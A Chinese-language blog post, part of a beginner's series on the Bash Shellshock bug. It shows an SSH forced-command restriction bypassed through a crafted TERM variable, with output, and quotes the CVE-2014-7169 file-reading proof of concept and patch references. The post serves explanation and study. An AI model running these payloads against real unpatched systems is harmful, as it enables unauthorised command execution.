新手对Bash环境变量解析漏洞的理解(4)

在机器A上生成一对RSA key pair:
shawn@debian-test32:~/.ssh$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/shawn/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/shawn/.ssh/id_rsa.
Your public key has been saved in /home/shawn/.ssh/id_rsa.pub.
The key fingerprint is:
09:1c:92:fb:c5:68:f8:e1:b9:c2:62:a8:c7:75:5b:dc shawn@debian-test32
The key's randomart image is:
+--[ RSA 2048]----+
|    ...          |
|    .o .        |
|    ooo        |
|    o +.o.      |
|    = =S.      |
|    . * o E      |
| o o . +        |
|. = o o          |
|oo . .          |
+-----------------+

把A的公钥拷贝到机器B上：
$cat /home/shawn/.ssh/authorized_keys
command="/tmp/ssh.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9xYHEdjbbvSO+RAtDS3u+R4sD87SUQq5OZJ+6P5n3BoOz8eKfmK2B4qQa28uGvpseFSSXIoXTKdeS3mCXevbibGG6E3RQ63U7USrh9iQupO6c45Qt+3/WOo7X3mRlZ1awUmCjurcA5Zm/yOvyMJCoRd1kpkiJljgHtMztEhWvAE4inFkqyWC81SSfsvNd/GEiyCpFw84UTdF/cH626V3V73hlxwBMd8UKI27I7ATMOcPgWsI5738tLpgPDSisvZZXZNlxAfvSgpxKYAHOQ9VsaJCG4q+Giob5iX4IDzn8gs8G7uGW+EGhzTMq83f/8ar5a5Ex8Dg9M/loYPIPp5gJ shawn@debian-test32

一个用于控制command/SSH_ORIGINAL_COMMAND的脚本
shawn@linux-ionf:~/.ssh> cat /tmp/ssh.sh
#!/bin/sh

case "$SSH_ORIGINAL_COMMAND" in
 "ps")
  ps -ef
  ;;
 "vmstat")
  vmstat 1 100
  ;;
 "cups stop")
  /etc/init.d/cupsys stop
  ;;
 "cups start")
  /etc/init.d/cupsys start
  ;;
 *)
  echo "Sorry. Only these commands are available to you:"
  echo "ps, vmstat, cupsys stop, cupsys start"
  #exit 1
  ;;
esac

机器A上可以正常的使用限制脚本:
shawn@debian-test32:~/.ssh$ export SSH_ORIGINAL_COMMAND="ps"
shawn@debian-test32:~/.ssh$ ssh  shawn@192.168.115.129 $SSH_ORIGINAL_COMMAND
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
UID        PID  PPID  C STIME TTY          TIME CMD
root        1    0  0 16:47 ?        00:00:02 /sbin/init showopts
root        2    0  0 16:47 ?        00:00:00 [kthreadd]
root        3    2  0 16:47 ?        00:00:00 [ksoftirqd/0]

借助TERM来利用：
shawn@debian-test32:~$ export TERM='() { :;}; id'; ssh  shawn@192.168.115.129
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
uid=1000(shawn) gid=100(users) groups=100(users)
Connection to 192.168.115.129 closed.

--[ 2. 补丁和后续

从最早GNU/Linux发行版社区收到的补丁：

https://bugzilla.novell.com/attachment.cgi?id=606672

可以看出BASH的确没有做异常处理，而直接解析后就执行了。

正式的社区补丁在这里：

但由于补丁修复的不完整，导致了CVE-2014-7169的爆出,POC如下：

shawn@shawn-fortress /tmp $ date -u > test_file
shawn@shawn-fortress /tmp $ env X='() { (a)=<\' bash -c 'test_file cat'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Thu Sep 25 09:37:04 UTC 2014

这个POC可以让攻击者能读文件，看来后续的故事还没结束...................

[1] BASH

[2] Bash specially-crafted environment variables code injection attack
https://securityblog.RedHat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

[3] CVE-2014-6271
?vulnId=CVE-2014-6271

[4] CVE-2014-7169
?vulnId=CVE-2014-7169

[4] CVE-2014-6271: remote code execution through bash